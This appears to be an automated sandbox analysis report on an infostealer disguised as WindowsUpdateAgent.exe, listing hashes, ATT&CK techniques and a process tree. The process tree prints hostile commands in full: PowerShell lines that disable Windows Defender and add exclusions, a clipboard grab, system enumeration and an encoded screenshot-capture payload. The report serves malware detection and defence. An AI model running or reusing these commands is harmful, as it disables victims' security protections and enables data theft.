4ad426172639516e2dd5e98c32f670db5457065c05f8ab87269459eebb057552

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-12-2024 02:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

yedek-main/WindowsUpdateAgent.exe
Size

7.4MB
MD5

7d4b7c9479e46227120720f2a2dcccda
SHA1

a85ad8695c5f1703ab6b1abd07eff86b4da4adca
SHA256

94525a0b12c1be31a958bb137d9c1a6f35cef4e9b0c01f95b75981bae5518d93
SHA512

c0cb31863256206f4c0e39d3baa8d5869e2cab630b3f9e1453d45964b054ca85ff11c5cf17c157efe84d16dc1f413f27cb762dfa1a0ab8f2a4556d901faa3c07
SSDEEP

196608:xmlEzPoLjv+bhqNVoB8Ck5c7GpNlpq41J2Jbk9qtlDf6s0:ChL+9qz88Ck+7q3p91JBqfJ0

Score

8^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1284	powershell.exe
2320	powershell.exe
3836	powershell.exe
4296	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	WindowsUpdateAgent.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1352	cmd.exe
4452	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1224	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe
4100	WindowsUpdateAgent.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
3388	tasklist.exe

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral6/files/0x000e000000023bb4-21.dat	upx
behavioral6/memory/4100-25-0x00007FFE646C0000-0x00007FFE64D98000-memory.dmp	upx
behavioral6/files/0x0009000000023baf-29.dat	upx
behavioral6/files/0x0008000000023bbc-39.dat	upx
behavioral6/memory/4100-48-0x00007FFE7D530000-0x00007FFE7D53F000-memory.dmp	upx
behavioral6/files/0x000a000000023b99-47.dat	upx
behavioral6/files/0x000c000000023b91-46.dat	upx
behavioral6/files/0x000a000000023b90-45.dat	upx
behavioral6/files/0x000b000000023b8f-44.dat	upx
behavioral6/files/0x000a000000023b8e-43.dat	upx
behavioral6/files/0x000a000000023b8d-42.dat	upx
behavioral6/files/0x000a000000023b8c-41.dat	upx
behavioral6/files/0x000a000000023b8a-40.dat	upx
behavioral6/files/0x0008000000023bbb-38.dat	upx
behavioral6/files/0x0008000000023bba-37.dat	upx
behavioral6/files/0x0009000000023bb0-34.dat	upx
behavioral6/files/0x0008000000023ba9-33.dat	upx
behavioral6/memory/4100-30-0x00007FFE79D80000-0x00007FFE79DA5000-memory.dmp	upx
behavioral6/files/0x000a000000023b8b-28.dat	upx
behavioral6/memory/4100-54-0x00007FFE77A70000-0x00007FFE77A9D000-memory.dmp	upx
behavioral6/memory/4100-57-0x00007FFE776B0000-0x00007FFE776C9000-memory.dmp	upx
behavioral6/memory/4100-58-0x00007FFE77400000-0x00007FFE77424000-memory.dmp	upx
behavioral6/memory/4100-60-0x00007FFE64540000-0x00007FFE646B6000-memory.dmp	upx
behavioral6/memory/4100-62-0x00007FFE736B0000-0x00007FFE736C9000-memory.dmp	upx
behavioral6/memory/4100-64-0x00007FFE73B40000-0x00007FFE73B4D000-memory.dmp	upx
behavioral6/memory/4100-70-0x00007FFE63D50000-0x00007FFE63E1D000-memory.dmp	upx
behavioral6/memory/4100-69-0x00007FFE70450000-0x00007FFE70483000-memory.dmp	upx
behavioral6/memory/4100-72-0x00007FFE79D80000-0x00007FFE79DA5000-memory.dmp	upx
behavioral6/memory/4100-80-0x00007FFE63C30000-0x00007FFE63D4B000-memory.dmp	upx
behavioral6/memory/4100-79-0x00007FFE73A10000-0x00007FFE73A1D000-memory.dmp	upx
behavioral6/memory/4100-78-0x00007FFE726D0000-0x00007FFE726E4000-memory.dmp	upx
behavioral6/memory/4100-71-0x00007FFE63E20000-0x00007FFE64342000-memory.dmp	upx
behavioral6/memory/4100-68-0x00007FFE646C0000-0x00007FFE64D98000-memory.dmp	upx
behavioral6/memory/4100-204-0x00007FFE77400000-0x00007FFE77424000-memory.dmp	upx
behavioral6/memory/4100-216-0x00007FFE64540000-0x00007FFE646B6000-memory.dmp	upx
behavioral6/memory/4100-251-0x00007FFE63D50000-0x00007FFE63E1D000-memory.dmp	upx
behavioral6/memory/4100-250-0x00007FFE70450000-0x00007FFE70483000-memory.dmp	upx
behavioral6/memory/4100-252-0x00007FFE63E20000-0x00007FFE64342000-memory.dmp	upx
behavioral6/memory/4100-271-0x00007FFE646C0000-0x00007FFE64D98000-memory.dmp	upx
behavioral6/memory/4100-272-0x00007FFE79D80000-0x00007FFE79DA5000-memory.dmp	upx
behavioral6/memory/4100-306-0x00007FFE646C0000-0x00007FFE64D98000-memory.dmp	upx
behavioral6/memory/4100-331-0x00007FFE63D50000-0x00007FFE63E1D000-memory.dmp	upx
behavioral6/memory/4100-330-0x00007FFE70450000-0x00007FFE70483000-memory.dmp	upx
behavioral6/memory/4100-329-0x00007FFE73B40000-0x00007FFE73B4D000-memory.dmp	upx
behavioral6/memory/4100-328-0x00007FFE736B0000-0x00007FFE736C9000-memory.dmp	upx
behavioral6/memory/4100-327-0x00007FFE64540000-0x00007FFE646B6000-memory.dmp	upx
behavioral6/memory/4100-326-0x00007FFE77A70000-0x00007FFE77A9D000-memory.dmp	upx
behavioral6/memory/4100-325-0x00007FFE776B0000-0x00007FFE776C9000-memory.dmp	upx
behavioral6/memory/4100-324-0x00007FFE77400000-0x00007FFE77424000-memory.dmp	upx
behavioral6/memory/4100-323-0x00007FFE7D530000-0x00007FFE7D53F000-memory.dmp	upx
behavioral6/memory/4100-322-0x00007FFE79D80000-0x00007FFE79DA5000-memory.dmp	upx
behavioral6/memory/4100-321-0x00007FFE63C30000-0x00007FFE63D4B000-memory.dmp	upx
behavioral6/memory/4100-319-0x00007FFE73A10000-0x00007FFE73A1D000-memory.dmp	upx
behavioral6/memory/4100-318-0x00007FFE726D0000-0x00007FFE726E4000-memory.dmp	upx
behavioral6/memory/4100-316-0x00007FFE63E20000-0x00007FFE64342000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3768	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5064	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3836	powershell.exe
3836	powershell.exe
2320	powershell.exe
2320	powershell.exe
1284	powershell.exe
1284	powershell.exe
1284	powershell.exe
4452	powershell.exe
4452	powershell.exe
3908	powershell.exe
3908	powershell.exe
3908	powershell.exe
2320	powershell.exe
4452	powershell.exe
4296	powershell.exe
4296	powershell.exe
4048	powershell.exe
4048	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeIncreaseQuotaPrivilege	2960	WMIC.exe
Token: SeSecurityPrivilege	2960	WMIC.exe
Token: SeTakeOwnershipPrivilege	2960	WMIC.exe
Token: SeLoadDriverPrivilege	2960	WMIC.exe
Token: SeSystemProfilePrivilege	2960	WMIC.exe
Token: SeSystemtimePrivilege	2960	WMIC.exe
Token: SeProfSingleProcessPrivilege	2960	WMIC.exe
Token: SeIncBasePriorityPrivilege	2960	WMIC.exe
Token: SeCreatePagefilePrivilege	2960	WMIC.exe
Token: SeBackupPrivilege	2960	WMIC.exe
Token: SeRestorePrivilege	2960	WMIC.exe
Token: SeShutdownPrivilege	2960	WMIC.exe
Token: SeDebugPrivilege	2960	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2960	WMIC.exe
Token: SeRemoteShutdownPrivilege	2960	WMIC.exe
Token: SeUndockPrivilege	2960	WMIC.exe
Token: SeManageVolumePrivilege	2960	WMIC.exe
Token: 33	2960	WMIC.exe
Token: 34	2960	WMIC.exe
Token: 35	2960	WMIC.exe
Token: 36	2960	WMIC.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	1284	powershell.exe
Token: SeDebugPrivilege	3388	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2960	WMIC.exe
Token: SeSecurityPrivilege	2960	WMIC.exe
Token: SeTakeOwnershipPrivilege	2960	WMIC.exe
Token: SeLoadDriverPrivilege	2960	WMIC.exe
Token: SeSystemProfilePrivilege	2960	WMIC.exe
Token: SeSystemtimePrivilege	2960	WMIC.exe
Token: SeProfSingleProcessPrivilege	2960	WMIC.exe
Token: SeIncBasePriorityPrivilege	2960	WMIC.exe
Token: SeCreatePagefilePrivilege	2960	WMIC.exe
Token: SeBackupPrivilege	2960	WMIC.exe
Token: SeRestorePrivilege	2960	WMIC.exe
Token: SeShutdownPrivilege	2960	WMIC.exe
Token: SeDebugPrivilege	2960	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2960	WMIC.exe
Token: SeRemoteShutdownPrivilege	2960	WMIC.exe
Token: SeUndockPrivilege	2960	WMIC.exe
Token: SeManageVolumePrivilege	2960	WMIC.exe
Token: 33	2960	WMIC.exe
Token: 34	2960	WMIC.exe
Token: 35	2960	WMIC.exe
Token: 36	2960	WMIC.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	3908	powershell.exe
Token: SeIncreaseQuotaPrivilege	1028	WMIC.exe
Token: SeSecurityPrivilege	1028	WMIC.exe
Token: SeTakeOwnershipPrivilege	1028	WMIC.exe
Token: SeLoadDriverPrivilege	1028	WMIC.exe
Token: SeSystemProfilePrivilege	1028	WMIC.exe
Token: SeSystemtimePrivilege	1028	WMIC.exe
Token: SeProfSingleProcessPrivilege	1028	WMIC.exe
Token: SeIncBasePriorityPrivilege	1028	WMIC.exe
Token: SeCreatePagefilePrivilege	1028	WMIC.exe
Token: SeBackupPrivilege	1028	WMIC.exe
Token: SeRestorePrivilege	1028	WMIC.exe
Token: SeShutdownPrivilege	1028	WMIC.exe
Token: SeDebugPrivilege	1028	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1028	WMIC.exe
Token: SeRemoteShutdownPrivilege	1028	WMIC.exe
Token: SeUndockPrivilege	1028	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3412 wrote to memory of 4100	3412	WindowsUpdateAgent.exe	83
PID 3412 wrote to memory of 4100	3412	WindowsUpdateAgent.exe	83
PID 4100 wrote to memory of 1924	4100	WindowsUpdateAgent.exe	84
PID 4100 wrote to memory of 1924	4100	WindowsUpdateAgent.exe	84
PID 4100 wrote to memory of 2484	4100	WindowsUpdateAgent.exe	85
PID 4100 wrote to memory of 2484	4100	WindowsUpdateAgent.exe	85
PID 4100 wrote to memory of 4884	4100	WindowsUpdateAgent.exe	86
PID 4100 wrote to memory of 4884	4100	WindowsUpdateAgent.exe	86
PID 2484 wrote to memory of 3836	2484	cmd.exe	90
PID 2484 wrote to memory of 3836	2484	cmd.exe	90
PID 4100 wrote to memory of 1468	4100	WindowsUpdateAgent.exe	91
PID 4100 wrote to memory of 1468	4100	WindowsUpdateAgent.exe	91
PID 4100 wrote to memory of 1352	4100	WindowsUpdateAgent.exe	92
PID 4100 wrote to memory of 1352	4100	WindowsUpdateAgent.exe	92
PID 4100 wrote to memory of 4852	4100	WindowsUpdateAgent.exe	95
PID 4100 wrote to memory of 4852	4100	WindowsUpdateAgent.exe	95
PID 4884 wrote to memory of 2320	4884	cmd.exe	97
PID 4884 wrote to memory of 2320	4884	cmd.exe	97
PID 1468 wrote to memory of 2960	1468	cmd.exe	98
PID 1468 wrote to memory of 2960	1468	cmd.exe	98
PID 1924 wrote to memory of 1284	1924	cmd.exe	99
PID 1924 wrote to memory of 1284	1924	cmd.exe	99
PID 4100 wrote to memory of 4784	4100	WindowsUpdateAgent.exe	100
PID 4100 wrote to memory of 4784	4100	WindowsUpdateAgent.exe	100
PID 4100 wrote to memory of 116	4100	WindowsUpdateAgent.exe	102
PID 4100 wrote to memory of 116	4100	WindowsUpdateAgent.exe	102
PID 4100 wrote to memory of 4828	4100	WindowsUpdateAgent.exe	104
PID 4100 wrote to memory of 4828	4100	WindowsUpdateAgent.exe	104
PID 4100 wrote to memory of 968	4100	WindowsUpdateAgent.exe	106
PID 4100 wrote to memory of 968	4100	WindowsUpdateAgent.exe	106
PID 4852 wrote to memory of 3388	4852	cmd.exe	107
PID 4852 wrote to memory of 3388	4852	cmd.exe	107
PID 1352 wrote to memory of 4452	1352	cmd.exe	109
PID 1352 wrote to memory of 4452	1352	cmd.exe	109
PID 4784 wrote to memory of 3532	4784	cmd.exe	110
PID 4784 wrote to memory of 3532	4784	cmd.exe	110
PID 968 wrote to memory of 3908	968	cmd.exe	111
PID 968 wrote to memory of 3908	968	cmd.exe	111
PID 4828 wrote to memory of 4352	4828	cmd.exe	112
PID 4828 wrote to memory of 4352	4828	cmd.exe	112
PID 116 wrote to memory of 5064	116	cmd.exe	114
PID 116 wrote to memory of 5064	116	cmd.exe	114
PID 4100 wrote to memory of 900	4100	WindowsUpdateAgent.exe	115
PID 4100 wrote to memory of 900	4100	WindowsUpdateAgent.exe	115
PID 900 wrote to memory of 3596	900	cmd.exe	117
PID 900 wrote to memory of 3596	900	cmd.exe	117
PID 4100 wrote to memory of 4512	4100	WindowsUpdateAgent.exe	118
PID 4100 wrote to memory of 4512	4100	WindowsUpdateAgent.exe	118
PID 4100 wrote to memory of 3644	4100	WindowsUpdateAgent.exe	120
PID 4100 wrote to memory of 3644	4100	WindowsUpdateAgent.exe	120
PID 4512 wrote to memory of 3628	4512	cmd.exe	122
PID 4512 wrote to memory of 3628	4512	cmd.exe	122
PID 3908 wrote to memory of 3608	3908	powershell.exe	123
PID 3908 wrote to memory of 3608	3908	powershell.exe	123
PID 3644 wrote to memory of 2932	3644	cmd.exe	124
PID 3644 wrote to memory of 2932	3644	cmd.exe	124
PID 4100 wrote to memory of 3128	4100	WindowsUpdateAgent.exe	125
PID 4100 wrote to memory of 3128	4100	WindowsUpdateAgent.exe	125
PID 4100 wrote to memory of 4976	4100	WindowsUpdateAgent.exe	127
PID 4100 wrote to memory of 4976	4100	WindowsUpdateAgent.exe	127
PID 3128 wrote to memory of 4700	3128	cmd.exe	130
PID 3128 wrote to memory of 4700	3128	cmd.exe	130
PID 3608 wrote to memory of 4688	3608	csc.exe	129
PID 3608 wrote to memory of 4688	3608	csc.exe	129

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3328	attrib.exe
2932	attrib.exe

C:\Users\Admin\AppData\Local\Temp\yedek-main\WindowsUpdateAgent.exe
"C:\Users\Admin\AppData\Local\Temp\yedek-main\WindowsUpdateAgent.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3412
- C:\Users\Admin\AppData\Local\Temp\yedek-main\WindowsUpdateAgent.exe
  "C:\Users\Admin\AppData\Local\Temp\yedek-main\WindowsUpdateAgent.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\yedek-main\WindowsUpdateAgent.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\yedek-main\WindowsUpdateAgent.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1468
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4784
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:116
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4828
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
